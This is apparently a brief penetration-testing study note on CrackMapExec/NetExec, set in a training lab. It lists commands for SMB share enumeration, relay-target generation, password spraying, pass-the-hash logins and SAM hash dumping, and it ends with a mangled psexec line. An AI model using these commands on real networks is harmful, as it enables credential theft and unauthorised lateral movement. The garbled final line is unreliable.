crackmapexec
- now named NetExec
- alround tool for windows network stuff
installation
usage
enumerate smb
$ crackmapexec smb targets -M shares
find targets for relaying
$ crackmapexec smb <io-range> --gen-relay-list ~/targets.txt
pass-the-password
$ crackmapexec smb 10.0.0.0/24 -u user -d domain -p pass
pass-the-hash
$ crackmapexec smb 10.0.0.0/24 -u user -d domain -H hash --local
$ cme smb -u "administrator" -H ntlm:lm --local-auth
- green cyan should be checked, it might not be say “pwn’ed”
use password to dump hashes and then use them to login
$ crackmapexec smb -u fcastle -d MARVEL -p Password1 192.168.122.0/24 --sam
# then we can use psexec.py
$ marvel.local/fcastle:[email protected]
References